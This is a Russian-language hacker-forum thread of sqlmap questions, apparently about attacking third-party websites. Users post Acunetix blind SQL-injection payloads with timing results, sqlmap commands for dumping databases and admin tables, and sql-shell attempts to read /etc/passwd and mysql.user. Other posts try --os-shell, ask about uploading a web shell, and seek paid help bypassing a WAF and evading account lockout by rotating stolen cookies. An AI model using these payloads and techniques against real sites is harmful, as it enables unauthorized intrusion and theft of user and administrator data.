Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    Помогло? У меня несколько раз прокатывало
     
    ex3x1 likes this.
  2. hashfinderboss

    hashfinderboss New Member

    Joined:
    31 Jan 2020
    Messages:
    13
    Likes Received:
    1
    Reputations:
    0
    как то можно поменять пароль в админку через мап?
    может быть возможно если есть привлегии и тп?
     
  3. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    Возможно, если есть приведении и тп то можно шел залить и делать все что угодно
     
  4. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    Если инъекция в UPDATE или после ; то можно попробовать.
     
    _________________________
  5. hashfinderboss

    hashfinderboss New Member

    Joined:
    31 Jan 2020
    Messages:
    13
    Likes Received:
    1
    Reputations:
    0
    я знаю что есть ерор,унион,болеан,таймбасед,стэйкед,инлине а как выглядит UPDATE?как проверить UPDATE или нет?
     
  6. mixer123

    mixer123 Member

    Joined:
    19 Sep 2011
    Messages:
    17
    Likes Received:
    5
    Reputations:
    0
    Доброго времени всем. При таком запросе:
    sqlmap.py --random-agent -u "https://www.site.com" --dbs --keep-alive
    Получаю название бд. Дальше при такой команде:
    sqlmap.py --random-agent -u "https://www.site.com" target url -D dbname --tables
    Получаю следующее:
    [​IMG]

    Пробовал напрямую делать запрос:
    sqlmap.py --random-agent -u "https://site.com" target url -D dbname -T user --columns

    Такая же ошибка
    [​IMG]

    Я так понимаю дело в этом?

    [​IMG]

    Подскажите пожалуйста, какие команды можно попробовать? Что можно сделать?
    Структура движка мне знакома. Исходя из этого, названия таблиц и колонок я предположительно знаю.

    P.s
    Если у кого есть свободное время, и опыт в обходе WAF, просьба написать в лс.
    Есть предложение на взаимовыгодных условиях.
     
    #1026 mixer123, 2 Apr 2020
    Last edited: 2 Apr 2020
  7. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    306
    Likes Received:
    138
    Reputations:
    33
    UPDATE, это оператор который обновляет столбцы в базе данных.
    mysql.ru/docs/man/UPDATE.html

    Если выполнить вывод из той же таблицы в которую гипотетически идет обновление строк, MySQL выбьет ошибку Can't specify target table for update in FROM clause
     
  8. mixer123

    mixer123 Member

    Joined:
    19 Sep 2011
    Messages:
    17
    Likes Received:
    5
    Reputations:
    0
    Застрял на этом моменте:

    [​IMG]

    Подскажите, что делать дальше?
     
    #1028 mixer123, 2 Apr 2020
    Last edited: 2 Apr 2020
  9. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    Искать тамперы
     
    mixer123 likes this.
  10. rozzet

    rozzet New Member

    Joined:
    29 Oct 2017
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Как эксплуатировать найденые уязвимости акунетикс в sqlmap?помогите разобраться


    например это?
    The vulnerability affects https://site.com/product/11/HP-4250N-LaserJet-Printer-LIKE-NEW , X-Forwarded-For

    Discovered by Blind SQL Injection

    Attack Details
    arrow_drop_up
    HTTP Header input X-Forwarded-For was set to 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z

    Tests performed:
    0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 20.152
    0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z => 3.489
    0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 12.599
    0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 7.906
    0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.474
    0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.489
    0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 12.479
    0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 6.852
    0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 1.218


    Original value: 3iv1i

    HTTP Request
    arrow_drop_up
    GET /product/11/HP-4250N-LaserJet-Printer-LIKE-NEW HTTP/1.1
    Referer: https://www.google.com/search?hl=en&q=testing
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
    X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z
    Cookie: PHPSESSID=nfek80so1e2bn7p6st0503aro0
    X-Requested-With: XMLHttpRequest
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Encoding: gzip,deflate
    Host: copyfaxes.com
    Connection: Keep-alive
     
  11. rozzet

    rozzet New Member

    Joined:
    29 Oct 2017
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    и это например?буду предельно благодарен за помощь.
    The vulnerability affects https://www.site.com/ , /<s>-<n>-[*]-<n>.html

    Discovered by Blind SQL Injection

    Attack Details
    arrow_drop_up
    Path Fragment input /<s>-<n>-[*]-<n>.html was set to volts-amplifier-and-cd-players' AND 3*2*1=6 AND '000iUNL'='000iUNL

    Tests performed:
    volts-amplifier-and-cd-players' AND 2*3*8=6*8 AND '000iUNL'='000iUNL => TRUE
    volts-amplifier-and-cd-players' AND 2*3*8=6*9 AND '000iUNL'='000iUNL => FALSE
    volts-amplifier-and-cd-players' AND 3*3<(2*4) AND '000iUNL'='000iUNL => FALSE
    volts-amplifier-and-cd-players' AND 3*2>(1*5) AND '000iUNL'='000iUNL => TRUE
    volts-amplifier-and-cd-players' AND 3*2*0>=0 AND '000iUNL'='000iUNL => TRUE
    volts-amplifier-and-cd-players' AND 3*3*9<(2*4) AND '000iUNL'='000iUNL => FALSE
    volts-amplifier-and-cd-players' AND 5*4=20 AND '000iUNL'='000iUNL => TRUE
    volts-amplifier-and-cd-players' AND 5*4=21 AND '000iUNL'='000iUNL => FALSE
    volts-amplifier-and-cd-players' AND 5*6<26 AND '000iUNL'='000iUNL => FALSE
    volts-amplifier-and-cd-players' AND 7*7>48 AND '000iUNL'='000iUNL => TRUE
    volts-amplifier-and-cd-players' AND 3*2*0=6 AND '000iUNL'='000iUNL => FALSE
    volts-amplifier-and-cd-players' AND 3*2*1=6 AND '000iUNL'='000iUNL => TRUE


    Original value: volts-amplifier-and-cd-players

    HTTP Request
    arrow_drop_up
    GET /search-110-volts-amplifier-and-cd-players'%20AND%203*2*1=6%20AND%20'000iUNL'='000iUNL-1517.html HTTP/1.1
    X-Requested-With: XMLHttpRequest
    Referer: https://www.site.com/
    Cookie: PHPSESSID=jbf01bl7tu9q5j81f3mui12mof
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Encoding: gzip,deflate
    Host: www.site.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive
     
  12. vladF

    vladF New Member

    Joined:
    5 Dec 2018
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    Всем привет. Acunetix выдал такое:
    Code:
    Уязвимость затрагивает https://www.site.com/ , / <s> / <s> / [*] / <s> /
    
    Обнаружено слепым SQL-инъекцией
    
    Детали атаки
    arrow_drop_up
    Вход фрагмента пути / <s> / <s> / [*] / <s> / был установлен в 0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z Выполнены
    
    тесты :
    0'XOR (if (now () = sysdate (), sleep (12), 0)) XOR'Z => 12.294
    0'XOR (if (now () = sysdate (), sleep (6), 0)) XOR'Z => 6.29
    0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z => 0,283
    0'XOR (if (now () = sysdate (), sleep (12), 0)) XOR'Z => 12.29
    0'XOR (if (now () = sysdate (), sleep (3), 0)) XOR'Z => 3.255
    0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z => 0,286
    0'XOR (if (now () = sysdate (), sleep (12), 0)) XOR'Z => 12.314
    0'XOR (if (now () = sysdate (), sleep (6), 0)) XOR'Z => 6.252
    0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z => 0,31
    
    
    Первоначальное значение: doe-spiransuchor
    
    HTTP-запрос
    arrow_drop_up
    GET / spaelet / ubonteutr / 0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z /
    Как правильно скормить в sqlmap?
     
  13. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    Точно так же как написали выше, со слепыми может быть ложное срабатывание
     
    rozzet and vladF like this.
  14. vladF

    vladF New Member

    Joined:
    5 Dec 2018
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    Двумя сканерами проверил,не должна быть ложная
     
  15. kasper2020

    kasper2020 New Member

    Joined:
    30 Apr 2020
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Можно ли обойти WAF который блокирует все запросы POST, GET, в которых содержится "select*from", "update*set","delete*from" регистро-независимо?
    Не совсем понятно на каком уровне проходит WAF, но urlencode блокируется.

    back-end DBMS: MySQL >= 5.0.0
    banner: '5.7.26-log'
    server: Apache/2.2.15 (CentOS)
    x-powered-by: PHP/5.3.3
     
  16. LeninDie

    LeninDie Member

    Joined:
    26 Dec 2015
    Messages:
    72
    Likes Received:
    8
    Reputations:
    2
    столкнулся с ситуацией что приложение лочит аккаунт после 10 ошибок 500, скуля слепая и иначе данные никак не получить. поскольку лочится сам аккаунт то думаю что можно юзать куки от нескольких пользователей. на ум приходит только заменять куки при каждом запросе на новые и далее по кругу при каждом запросе (брать их из текстового файла) с определенным таймингом и подключить этот скрипт в качестве темпера. Подскажите это осуществимо? Мог бы кто нибудь помочь с реализацией за вознаграждение?)
     
  17. rozzet

    rozzet New Member

    Joined:
    29 Oct 2017
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    если акунетикс пишет SQL injection а не блинд, значит ложные исключены?
    Как часто акунетикс выдает ложные скули?
     
  18. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    Ну если он пишет что union query или error based, то да, если time based то может и ложное, где то процентов 15
     
  19. tester_new

    tester_new Elder - Старейшина

    Joined:
    12 Feb 2012
    Messages:
    300
    Likes Received:
    45
    Reputations:
    24
    Буду рад помощи, сливаю базу ниже указанным способом:
    Code:
    sqlmap -r my_http  --dump --threads=5 --dbms=mysql --dump -D some_db  --risk=3
    Скорость просто ужас(пробовал менять потоки, тайминги итд.. результата ноль) Как следствие Пробую слить данные только админов, указываю таблицу и запускаю:
    Code:
    sqlmap -r my_http  --dump --threads=5 --dbms=mysql --dump -D some_db  -T admin_table --risk=3
    
    [12:15:44] [WARNING] time-based comparison requires larger statistical model, please wait............................. (done) 
    do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
    [12:15:56] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
    [12:15:57] [INFO] adjusting time delay to 1 second due to good response times
    [12:15:58] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
    [12:15:58] [ERROR] unable to retrieve the number of columns for table 'admin_table' in database 'some_db'
    [12:15:58] [WARNING] unable to retrieve column names for table 'admin_table' in database 'some_db'
    [12:18:10] [WARNING] unable to enumerate the columns for table 'admin_table' in database 'some_db'
    [12:18:10] [INFO] fetched data logged to text files under '/root/.sqlmap/....'
    Получаю облом.... Пробую --sql-shell:
    Code:
    sql-shell> SELECT LOAD_FILE('/etc/passwd');
    [INFO] fetching SQL SELECT statement query output: 'SELECT LOAD_FILE('/etc/passwd')'
    [INFO] retrieved:
    
    sql-shell> desc mysql.user
    [INFO] fetching SQL query output: 'desc mysql.user'
    [INFO] retrieved:
    
    sql-shell> SELECT * FROM mysql.user;
    [INFO] fetching SQL SELECT statement query output: 'SELECT * FROM mysql.user'
    [INFO] you did not provide the fields in your query. sqlmap will retrieve the column names itself
    [INFO] fetching columns for table 'user' in database 'mysql'
    [INFO] retrieved:
    [ERROR] unable to retrieve the number of columns for table 'user' in database 'mysql'
    [INFO] retrieved:
    [WARNING] the SQL query provided does not return any output
    
    Снова облом а именно... в первых двух случаях получаю просто пустые строки, в третьем случае просто ошибка, пробую заюзать --os-shell:
    Code:
    [WARNING] unable to automatically retrieve the web server document root
    what do you want to use for writable directory?
    [1] common location(s) ('/var/www/, /var/www/html, /usr/local/apache2/htdocs, /var/www/nginx-default, /srv/www') (default)
    [2] custom location(s)
    [3] custom directory list file
    [4] brute force search
    
    Если лить в первый path-и(1) то получаю постоянно 404 (Not Found)
    пробовал сразу сбрутить(4) по предоставленному sqlmap-ом словарю... но все без результата.

    Главный вопрос: как так я могу получить дамп всей базы но не имею возможность указать конкретную таблицу?
    Пробовал имя таблицы указывать в ' ' подскажите что я упускаю...

    Решение:
    Напишу вдруг кому то поможет :) В моем случае проблема была в том что при запуске я 'соглашался' на редирект, после отказа от редиректа данные начали извлекаться нормально.
     
    #1039 tester_new, 10 May 2020
    Last edited: 11 May 2020
    vladF likes this.
  20. vladF

    vladF New Member

    Joined:
    5 Dec 2018
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    Нужна помощь
    Сканер выдал такое:
    Code:
    This vulnerability affects /part_eYXfQU0lw9rhwob9qRP2GVMv.html.
    Discovered by: Scripting (Blind_Sql_Injection.script).
    Attack details
    URL encoded POST input partid was set to -1' OR 3*2*1=6 AND 000323=000323 or 'XAZghp6T'='
    
    Tests performed:
    -1' OR 2+323-323-1=0+0+0+1 or 'XAZghp6T'=' => TRUE
    -1' OR 3+323-323-1=0+0+0+1 or 'XAZghp6T'=' => FALSE
    -1' OR 3*2<(0+5+323-323) or 'XAZghp6T'=' => FALSE
    -1' OR 3*2>(0+5+323-323) or 'XAZghp6T'=' => FALSE
    -1' OR 2+1-1-1=1 AND 000323=000323 or 'XAZghp6T'=' => TRUE
    -1' OR 000323=000323 AND 3+1-1-1=1 or 'XAZghp6T'=' => FALSE
    -1' OR 3*2=5 AND 000323=000323 or 'XAZghp6T'=' => FALSE
    -1' OR 3*2=6 AND 000323=000323 or 'XAZghp6T'=' => TRUE
    -1' OR 3*2*0=6 AND 000323=000323 or 'XAZghp6T'=' => FALSE
    -1' OR 3*2*1=6 AND 000323=000323 or 'XAZghp6T'=' => TRUE
    Как правильно скормить в sqlmap?